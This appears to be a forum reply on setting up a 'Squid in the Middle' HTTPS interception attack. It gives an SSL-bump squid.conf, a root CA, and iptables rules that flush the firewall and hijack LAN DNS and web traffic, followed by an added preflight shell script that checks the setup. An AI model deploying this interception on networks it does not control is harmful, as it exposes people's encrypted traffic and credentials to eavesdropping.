Hi there!
There are a lot of things that have to be done to successfully perform a "Squid in the Middle" attack. Squid is a HUGE chapter.
First of all, you cannot redirect port 443 if squid3 has not been compiled with SSL bump and dynamic SSL certificate generation (you will find a lot of information on the Internet about how to do that). Squid 3.1.20 from Kali's repos doesn't offer that and, as far as I know, none do. You have to compile it yourself.
Code:
squid3 -v
Squid Cache: Version 3.1.20
configure options: '--build=i486-linux-gnu' '--prefix=/usr' '--includedir=${prefix}/include' '--mandir=${prefix}/share/man' '--infodir=${prefix}/share/info' '--sysconfdir=/etc' '--localstatedir=/var' '--libexecdir=${prefix}/lib/squid3' '--srcdir=.' '--disable-maintainer-mode' '--disable-dependency-tracking' '--disable-silent-rules' '--datadir=/usr/share/squid3' '--sysconfdir=/etc/squid3' '--mandir=/usr/share/man' '--with-cppunit-basedir=/usr' '--enable-inline' '--enable-async-io=8' '--enable-storeio=ufs,aufs,diskd' '--enable-removal-policies=lru,heap' '--enable-delay-pools' '--enable-cache-digests' '--enable-underscores' '--enable-icap-client' '--enable-follow-x-forwarded-for' '--enable-auth=basic,digest,ntlm,negotiate' '--enable-basic-auth-helpers=LDAP,MSNT,NCSA,PAM,SASL,SMB,YP,DB,POP3,getpwnam,squid_radius_auth,multi-domain-NTLM' '--enable-ntlm-auth-helpers=smb_lm,' '--enable-digest-auth-helpers=ldap,password' '--enable-negotiate-auth-helpers=squid_kerb_auth' '--enable-external-acl-helpers=ip_user,ldap_group,session,unix_group,wbinfo_group' '--enable-arp-acl' '--enable-esi' '--enable-zph-qos' '--enable-wccpv2' '--disable-translation' '--with-logdir=/var/log/squid3' '--with-pidfile=/var/run/squid3.pid' '--with-filedescriptors=65536' '--with-large-files' '--with-default-user=proxy' '--enable-linux-netfilter' 'build_alias=i486-linux-gnu' 'CFLAGS=-g -O2 -fPIE -fstack-protector --param=ssp-buffer-size=4 -Wformat -Werror=format-security -Wall' 'LDFLAGS=-fPIE -pie -Wl,-z,relro -Wl,-z,now' 'CPPFLAGS=-D_FORTIFY_SOURCE=2' 'CXXFLAGS=-g -O2 -fPIE -fstack-protector --param=ssp-buffer-size=4 -Wformat -Werror=format-security' --with-squid=/build/squid3-tMZN4r/squid3-3.1.20
Second, the squid.conf file has to be in the right form and the rules (ACLs) have to be correct. (Where is your squid.conf?)
ex:
Code:
# On Squid 3.1 you must also define manager and localhost yourself; 3.2 and later predefine them:
# acl manager proto cache_object
# acl localhost src 127.0.0.1/32
acl localnet src 192.168.60.0/24 # My LAN
acl safeports port 21 70 80 210 280 443 488 563 591 631 777 901 81 3127-3129 1025-65535
acl sslports port 443 563 81 2087 8081 10000
acl CONNECT method CONNECT
http_access allow manager localhost
http_access deny manager
http_access deny !safeports
http_access deny CONNECT !sslports
http_access allow localhost
http_access allow localnet
http_access deny all
# Go to origin servers directly, never to a parent proxy
always_direct allow all # Critical!
# Connect to the real server first, then mimic its certificate for the client
ssl_bump server-first all # Critical!
# Ports: 3127 http proxy, 3128 http transparent, 3129 https transparent.
http_port 3127 # Critical!
http_port 3128 intercept # Critical!
# cert= and key= point at the same PEM: it holds both the CA certificate and its private key
https_port 3129 intercept ssl-bump generate-host-certificates=on dynamic_cert_mem_cache_size=4MB cert=/../.../certificates/personal-ca.pem key=/../../certificates/personal-ca.pem # Critical!
# The database must be created once before the first start: ssl_crtd -c -s /var/lib/ssl_db
sslcrtd_program /usr/lib/squid3/ssl_crtd -s /var/lib/ssl_db -M 4MB
sslcrtd_children 10 startup=5 idle=2
# Place your DNS servers here
dns_nameservers DNS1 DNS2
hierarchy_stoplist cgi-bin ?
# Memory Cache Options: 512 MB of RAM
cache_mem 512 MB
maximum_object_size_in_memory 5MB
refresh_pattern ^ftp: 1440 20% 10080
refresh_pattern ^gopher: 1440 0% 1440
refresh_pattern -i (/cgi-bin/|\?) 0 0% 0
refresh_pattern . 0 20% 4320
coredump_dir /var/spool/squid3
access_log stdio:/var/log/squid3/access.log squid
As you can see, I've already created a root CA certificate (personal-ca.pem) which is used by squid3.
The iptables rules for the previous squid.conf file should look something like this (I'm not using ARPspoof):
Code:
# Enable IPv4 forwarding so LAN traffic can pass through this box
echo 1 > /proc/sys/net/ipv4/ip_forward
# Start from empty filter and nat tables
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
# NAT the LAN out through the Internet interface
iptables --table nat --append POSTROUTING --out-interface IFACE -j MASQUERADE
iptables --append FORWARD --in-interface LANFACE -j ACCEPT
# Send every DNS query from the LAN to this box
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to INETIP
# Transparent Squid3 Http & Https (Squid3 listens on 3128 (http traffic transparent) and 3129 (https traffic transparent))
# localhost can access Squid3 on 3127 as a normal http proxy
# 192.168.60.129 is this box's own address on LANFACE
iptables -t nat -A PREROUTING -i LANFACE -p tcp -m tcp --dport 80 -j DNAT --to-destination 192.168.60.129:3128
iptables -t nat -A PREROUTING -i LANFACE -p tcp -m tcp --dport 443 -j DNAT --to-destination 192.168.60.129:3129
iptables -t nat -A PREROUTING -i IFACE -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 3128
iptables -t nat -A PREROUTING -i IFACE -p tcp -m tcp --dport 443 -j REDIRECT --to-ports 3129
Where:
IFACE = your Internet interface (e.g. eth0)
INETIP = the IP of the Internet interface
LANFACE = the LAN interface you're trying to intercept (e.g. eth1)
I suggest you first try to set up a transparent-proxied LAN and then move forward to a more advanced subject such as an SSL-intercepted LAN. Luckily there is a lot of information on the Internet to accomplish that or any other task you decide to take on. It's crucial to understand what you are doing before you try it. I'm trying to say that just following another guy's instructions on how to do it is not enough. You HAVE to understand what you are doing.
If you have enough patience, I will upload in a month or so a script that includes a Squid in the middle attack on a wireless LAN.
Good luck!
PS Please don't ask for a "private" solution by e-mail. It's a good thing to get solutions publicly. I'm sure that other people will face exactly the same problems as you.
PS2 access.log and cache.log are your friends.
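As an added example (this is not code from the post above, and not Squid's own), a small POSIX shell preflight script covering the two things the post says you must get right before touching iptables: that the Squid binary was actually built with SSL bump and dynamic certificate generation, and that every ACL name the `http_access`/`ssl_bump`/`always_direct` lines use is really defined. The configure flags it looks for (`--enable-ssl` on 3.1 to 3.4, `--with-openssl` on 3.5+, and `--enable-ssl-crtd` on both) are Squid's; the `squid3 -v` samples are constructed from the post's output with the irrelevant options dropped. The function names, the single-PEM CA layout and the `openssl`/`ssl_crtd -c` commands in `setup_ca` are my assumptions and should be checked against your Squid version's documentation.

```shell
#!/bin/sh
# Added example, not from the original post. Preflight checks for the
# Squid SSL-bump setup described above. Assumptions (mine, not the
# post's): the function names, that the CA lives in one PEM holding key
# and certificate, and the openssl/ssl_crtd commands used in setup_ca.

# Sample "squid3 -v" output, constructed from the post's output with the
# irrelevant options dropped: the Kali build has no SSL options at all.
SAMPLE_SQUID_V_KALI="Squid Cache: Version 3.1.20
configure options: '--prefix=/usr' '--enable-icap-client' '--enable-linux-netfilter'"

# Same shape for a self-compiled build with bump support (constructed).
SAMPLE_SQUID_V_BUMP="Squid Cache: Version 3.3.8
configure options: '--prefix=/usr' '--enable-ssl' '--enable-ssl-crtd' '--enable-linux-netfilter'"

# Return 0 if the "squid -v" text advertises SSL bump with dynamic
# certificate generation. Squid 3.1-3.4 need --enable-ssl, 3.5+ need
# --with-openssl; both need --enable-ssl-crtd for the ssl_crtd helper.
check_ssl_bump_build() {
    case "$1" in
        *--enable-ssl-crtd*) ;;
        *) return 1 ;;
    esac
    # --enable-ssl is a prefix of --enable-ssl-crtd, so require the
    # closing quote, a space or end-of-string right after it.
    case "$1" in
        *"--enable-ssl'"*|*"--enable-ssl "*|*"--enable-ssl") return 0 ;;
        *--with-openssl*) return 0 ;;
    esac
    return 1
}

# Read a squid.conf on stdin and print every ACL name that http_access,
# ssl_bump or always_direct references (with or without a leading "!")
# but no "acl" line defines. $1 lists the names your Squid predefines,
# e.g. "all" for 3.1 or "all manager localhost to_localhost" for 3.2+.
# Names are compared case-insensitively, as Squid itself does.
undefined_acls() {
    awk -v builtin="$1" '
        BEGIN { n = split(builtin, b, " "); for (i = 1; i <= n; i++) def[tolower(b[i])] = 1 }
        /^[ \t]*#/ { next }
        $1 == "acl" { def[tolower($2)] = 1; next }
        $1 == "http_access" || $1 == "ssl_bump" || $1 == "always_direct" {
            for (i = 3; i <= NF; i++) {
                if ($i ~ /^#/) break             # trailing comment
                name = $i; sub(/^!/, "", name)
                if (name != "" && !(tolower(name) in def) && !seen[tolower(name)]++) print name
            }
        }'
}

# The ACL part of the post's squid.conf, embedded here as sample input.
sample_conf() {
    cat <<'EOF'
acl localnet src 192.168.60.0/24 # My LAN
acl safeports port 21 70 80 210 280 443 488 563 591 631 777 901 81 3127-3129 1025-65535
acl sslports port 443 563 81 2087 8081 10000
acl connect method CONNECT
http_access allow manager localhost
http_access deny manager
http_access deny !safeports
http_access deny CONNECT !sslports
http_access allow localhost
http_access allow localnet
http_access deny all
always_direct allow all # Critical!
ssl_bump server-first all # Critical!
EOF
}

# Create the signing CA (key and certificate in one PEM, as the post's
# cert=/key= lines expect) and initialise the ssl_crtd database. Run
# once, as root, before starting Squid. Assumed commands: the openssl
# invocation follows the Squid wiki; "ssl_crtd -c" creates the db.
setup_ca() {
    ca_pem="$1"; ssl_db="$2"
    [ -f "$ca_pem" ] || openssl req -new -newkey rsa:2048 -sha256 -days 365 -nodes -x509 \
        -extensions v3_ca -subj "/CN=personal-ca" -keyout "$ca_pem" -out "$ca_pem"
    [ -d "$ssl_db" ] || /usr/lib/squid3/ssl_crtd -c -s "$ssl_db" -M 4MB
    chown -R proxy:proxy "$ssl_db"   # Squid runs as "proxy" (--with-default-user=proxy)
}

# Usage: sh preflight.sh /usr/sbin/squid3 /etc/squid3/squid.conf
#    or: sh preflight.sh setup /path/personal-ca.pem /var/lib/ssl_db
if [ "${1:-}" = "setup" ]; then
    setup_ca "$2" "$3"
elif [ -n "${1:-}" ]; then
    if check_ssl_bump_build "$("$1" -v 2>&1)"; then
        echo "$1: built with SSL bump + ssl_crtd"
    else
        echo "$1: no SSL bump support, recompile with --enable-ssl --enable-ssl-crtd (3.5+: --with-openssl)"
    fi
    undefined_acls "all" < "${2:-/etc/squid3/squid.conf}" | sed 's/^/undefined ACL: /'
fi
```

Run against the post's own config with only `all` treated as predefined (i.e. on Squid 3.1) it reports `manager` and `localhost` as undefined, which is exactly what makes that config fail to load on 3.1 and load fine on 3.2+; the `connect`/`CONNECT` pair is not reported because Squid matches ACL names case-insensitively. Clients on the LAN must still import `personal-ca.pem` as a trusted root, or every bumped site will show a certificate warning.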